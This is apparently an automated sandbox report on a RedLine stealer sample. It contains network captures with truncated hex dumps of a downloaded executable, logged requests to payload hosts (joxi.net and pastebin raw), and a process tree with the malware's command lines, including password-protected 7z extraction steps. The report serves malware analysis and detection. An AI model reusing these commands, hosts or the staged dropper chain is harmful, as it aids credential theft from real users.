                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078202009 CEST1236INData Raw: 15 04 a1 41 00 5e c3 33 c0 5e c3 56 e8 ac fe ff ff 59 5e c3 53 8b 5c 24 0c 8b 03 83 63 04 00 66 83 20 00 56 8b 74 24 0c 57 6a 02 5f eb 08 66 3d 20 00 77 0a 03 f7 0f b7 06 66 85 c0 75 f0 66 83 3e 2c 75 0f eb 0b 66 85 c0 74 4d 66 3d 2c 00 74 47 03
                                                                                                                                                                                                                                        Data Ascii: A^3^VY^S\$cf Vt$Wj_f= wfuf>,uftMf=,tGf={u0{t+uFf8}tF"Ff8{uPfu_^[L$Vj\%L$j/;~^VW|$t$A~!FPPPt$
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.114105940 CEST1236INData Raw: 99 01 00 00 8b 45 e0 8b 1d 30 a2 41 00 46 83 65 e4 00 89 75 fc c6 00 00 eb 7c 3b 77 04 0f 8d a8 01 00 00 8b 07 8a 0c 30 46 80 f9 22 88 4d ec 89 75 fc 0f 84 ad 00 00 00 80 f9 5c 75 39 8a 04 30 46 3c 22 88 45 f0 89 75 fc 74 27 3a c1 74 1f 3c 6e 74
                                                                                                                                                                                                                                        Data Ascii: E0AFeu|;w0F"Mu\u90F<"Eut':t<nt<tMtj\ujjj\j"uMjhAPujhAPu#"t'\u|0"uF0FPMu^0u<tFuhEPEP
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.114236116 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sun, 29 Sep 2024 07:44:12 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3125704
                                                                                                                                                                                                                                        Last-Modified: Tue, 20 Aug 2024 12:02:17 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "66c485c9-2fb1c8"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ`@`!L!Require Windows$PEL?O_@X00Nu/<l.text `.rdata;<@@.dataM@.rsrcN0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.114515066 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sun, 29 Sep 2024 07:44:12 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3125704
                                                                                                                                                                                                                                        Last-Modified: Tue, 20 Aug 2024 12:02:17 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "66c485c9-2fb1c8"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ`@`!L!Require Windows$PEL?O_@X00Nu/<l.text `.rdata;<@@.dataM@.rsrcN0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.549715188.114.97.3802164C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.364132881 CEST285OUTGET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                        Host: joxi.net
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:23.040649891 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Date: Sun, 29 Sep 2024 07:44:22 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/5.4.45
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                        Set-Cookie: js=TDXdxR9wpSLEfe3duHHmkl2DL-m5CFjOCB8aEB3BMPMV6LAwi7quqy7NYHeLalZaDJDQeYWeP1SmJAhV6czAi3; path=/
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NrNfJO6YQEW%2BJa7wXSIGb5se52VS0%2FAdoigHXpNZkdQRQdFOjGFk%2BE7bNNrIFL%2BETpdYLqXksAvLOv2tEbfKameT9WcbPSGLvPr401JJZ0kjcqdr2KqALRP87g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8caa58fe49738c77-EWR
                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                        Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 74 94 cf 8e db 36 10 c6 ef 7e 0a 56 17 49 85 2c 7a b7 0e 90 d6 92 80 a4 09 0a f4 90 f4 90 1c 0a c3 28 b8 14 2d 73 57 16 15 92 5e af 91 0d b0 f1 06 41 8b 2d 10 a0 b9 f5 0d 7a 73 36 eb d6 89 ff 04 e8 13 0c 5f a1 4f 52 50 b2 9d 14 41 75 10 21 ce 37 3f 72 46 fc 18 7d 71 ef e1 b7 8f 7e fc e1 3e 1a e8 61 9e 34 a2 dd c0 48 9a 34 10 42 28 1a 32 4d 10 1d 10 a9 98 8e 9d 91 ee 37 6f 3b db 90 e6 3a 67 c9 f7 e2 8c a3 7f 2e 5e 23 73 09 37 b0 81 37 b0 86 99 79 85 e0 83 b9 80 0d bc 35 17 30 83 15 ac 60 86 e0 06 96 e6 15 32 cf e1 bd b9 80 05 ac cd cf b0 31 53 d8 c0 35 82 05 aa 92 57 30 b7 00 64 5e c0 0c de c1 b2 4a 5e 20 f8 00 1b 9b 38 37 53 58 44 b8 5e ba de 46 ce 8b 13 34 90 ac 1f 3b b8 4f 4e 39 15 45 c8 a9 70 90 64 79 ec a8 81 90 9a 8e 34 b2 f3 0e d2 93 92 c5 0e 1f 92 8c e1 b3 66 35 f7 29 a6 4e d1 93 9c a9 01 63 da d9 71 31 4d 8b f0 58 9c f1 50 8e 30 51 8a 69 85 a9 52 b8 dd 6a 87 54 29 27 69 d4 10 45 25 2f 75 4d f4 fa a3 82 6a 2e 0a 8f 07 2a 10 41 16 c8 80 04 43 ff 29 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: 34ct6~VI,z(-sW^A-zs6_ORPAu!7?rF}q~>a4H4B(2M7o;:g.^#s77y50`21S5W0d^J^ 87SXD^F4;ON9Epdy4f5)Ncq1MXP0QiRjT)'iE%/uMj.*AC)NAT=<:fTXvxWb:?O+`I\#5FCVh?`|Y1G4
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:23.040699005 CEST446INData Raw: fc 0e 89 55 48 25 23 9a dd cf 99 15 7a c2 0f f6 58 fb 0c 63 15 66 4c 6f c3 ea ee e4 11 c9 1e 90 21 f3 84 df 6d f5 3a 24 24 6a 52 d0 f8 a0 43 42 25 69 9c 75 86 61 49 24 2b f4 03 91 b2 90 17 8a 49 7d 97 f5 85 64 9e 2d b3 62 3f f3 bd 31 2f 52 31 0e
                                                                                                                                                                                                                                        Data Ascii: UH%#zXcfLo!m:$$jRCB%iuaI$+I}d-b?1/R1RAn#7p1aVIv_~fsz4j}}ux;L'#.+]UI=L+R+)IN9W+FxG#\{t4"Xdrw9Q*vrqbp[mnzL+


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.549716104.20.3.2354435552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-29 07:44:26 UTC74OUTGET /raw/dq3hWX27 HTTP/1.1
                                                                                                                                                                                                                                        Host: pastebin.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-09-29 07:44:26 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sun, 29 Sep 2024 07:44:26 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8caa5913685643f8-EWR
                                                                                                                                                                                                                                        2024-09-29 07:44:26 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                                        Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                                                        2024-09-29 07:44:26 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                                                                                                                                                                                                        Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                                                                                                                                                                                                        2024-09-29 07:44:26 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                                                                                                                                                                                                        Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                                                                                                                                                                                                        2024-09-29 07:44:26 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                                                                                                                                                                                                        Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                                                                                                                                                                                                        2024-09-29 07:44:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:03:43:56
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\inject.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\inject.exe"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:321'536 bytes
                                                                                                                                                                                                                                        MD5 hash:A1E894C08C924EEC77CE07E2A8405B86
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2055709662.00000000037F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:03:43:56
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:03:43:59
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0xd10000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.2215892910.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:03:44:14
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\conhost.exe"
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        File size:3'125'704 bytes
                                                                                                                                                                                                                                        MD5 hash:CE901A874C9D157E48F83B1BE3D32AA6
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                        • Detection: 83%, ReversingLabs
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:03:44:18
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                        Imagebase:0x7ff778560000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:03:44:18
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:03:44:18
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:mode 65,10
                                                                                                                                                                                                                                        Imagebase:0x7ff6c6e50000
                                                                                                                                                                                                                                        File size:33'280 bytes
                                                                                                                                                                                                                                        MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:03:44:18
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e file.zip -p29586644319935208542739921766 -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:03:44:19
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_11.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:03:44:19
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_10.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:03:44:19
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
                                                                                                                                                                                                                                        MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:03:44:19
                                                                                                                                                                                                                                        Start date:29/09/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                                                                                                                        Imagebase:0x310000
                                                                                                                                                                                                                                        File size:468'992 bytes
